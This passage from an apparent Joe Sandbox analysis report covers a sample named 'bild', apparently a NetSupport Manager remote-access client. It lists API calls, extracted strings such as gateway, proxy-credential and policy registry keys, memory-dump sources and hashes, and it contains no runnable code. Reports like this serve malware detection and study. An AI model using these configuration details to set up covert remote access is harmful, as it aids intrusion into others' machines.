                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf
                                                                                                      • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<vl
                                                                                                      • API String ID: 2111968516-3632491863
                                                                                                      • Opcode ID: 76f76b9ac09cb47c8b3a5a6423faa95afe3f6daad2b5a542889772078a507c55
                                                                                                      • Instruction ID: bcb9cba23b3be62561508f0f3d1655ad9c18315e94690b9f6c26d9a1449226cc
                                                                                                      • Opcode Fuzzy Hash: 76f76b9ac09cb47c8b3a5a6423faa95afe3f6daad2b5a542889772078a507c55
                                                                                                      • Instruction Fuzzy Hash: 1522A5B2A00258ABDF20CF65CD84EEAB7BDBB49304F4485E9E54D67A40DA315F88CF51
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                      • wsprintfA.USER32 ref: 11028214
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                                      • wsprintfA.USER32 ref: 11028291
                                                                                                      • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                                      • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                      • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                      • API String ID: 512045693-419896573
                                                                                                      • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                      • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                                      • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                      • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(PCIINV.DLL,4764EAAA,028776F0,028776E0,?,00000000,1118276C,000000FF,?,11031942,028776F0,00000000,?,?,?), ref: 11085E45
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                                      • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                                      • wsprintfA.USER32 ref: 11085F1B
                                                                                                      • wsprintfA.USER32 ref: 11085F32
                                                                                                      • wsprintfA.USER32 ref: 11085F49
                                                                                                      • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028776F0,00000000,?,?,?), ref: 11085A98
                                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028776F0,00000000,?,?,?), ref: 11085AAB
                                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028776F0,00000000,?,?,?), ref: 11085ABE
                                                                                                        • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,028776F0,00000000,?,?,?), ref: 11085AD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                      • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                      • API String ID: 4263811268-2492245516
                                                                                                      • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                      • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                                      • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                      • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                                      APIs
                                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                                      • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                      • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                      • API String ID: 2061479752-1320826866
                                                                                                      • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                      • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                                      • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                      • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 1110612E
                                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                                      • GetTickCount.KERNEL32 ref: 1110613D
                                                                                                      • GetTickCount.KERNEL32 ref: 11106190
                                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                                      • GetTickCount.KERNEL32 ref: 111061CA
                                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                                      • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                        • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                      • API String ID: 1574099134-3013461081
                                                                                                      • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                                      • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                                      • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                                      • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                                      • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                      • GetTickCount.KERNEL32 ref: 1102C574
                                                                                                        • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                                      • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                      • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                      • API String ID: 596640303-1725438197
                                                                                                      • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                      • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                                      • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                      • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                                        • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                        • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Enum$Open$CloseValue
                                                                                                      • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                      • API String ID: 2823542970-1528906934
                                                                                                      • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                      • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                                      • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                      • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • GetTickCount.KERNEL32 ref: 11137692
                                                                                                        • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                        • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                        • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                        • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                      • GetTickCount.KERNEL32 ref: 111376A1
                                                                                                      • _memset.LIBCMT ref: 111376E3
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                                      • _strrchr.LIBCMT ref: 11137708
                                                                                                      • _free.LIBCMT ref: 1113775A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                      • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                      • API String ID: 711243594-1270230032
                                                                                                      • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                      • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                                      • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                      • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                                      APIs
                                                                                                      • ioctlsocket.WSOCK32 ref: 6C757642
                                                                                                      • connect.WSOCK32(00000000,?,?), ref: 6C757659
                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C757660
                                                                                                      • _memmove.LIBCMT ref: 6C7576D3
                                                                                                      • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C7576F3
                                                                                                      • GetTickCount.KERNEL32 ref: 6C757717
                                                                                                      • ioctlsocket.WSOCK32 ref: 6C75775C
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C757762
                                                                                                      • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C75777A
                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C75778B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                      • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                      • API String ID: 4218156244-2969206566
                                                                                                      • Opcode ID: 8559b1bdd1959aa08d781ab45d76510091573b13a63db41bf4690b4db5241ded
                                                                                                      • Instruction ID: 5f9996f767658634e96e83021b18fd50fe058fa2912f3a5d772e3c74c1b30875
                                                                                                      • Opcode Fuzzy Hash: 8559b1bdd1959aa08d781ab45d76510091573b13a63db41bf4690b4db5241ded
                                                                                                      • Instruction Fuzzy Hash: ED412B719103189FEB208B74DE4CBE977BAAF44304F4085A9E50D97641EF709A68CFB1
                                                                                                      APIs
                                                                                                        • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                        • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                        • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                        • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                        • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
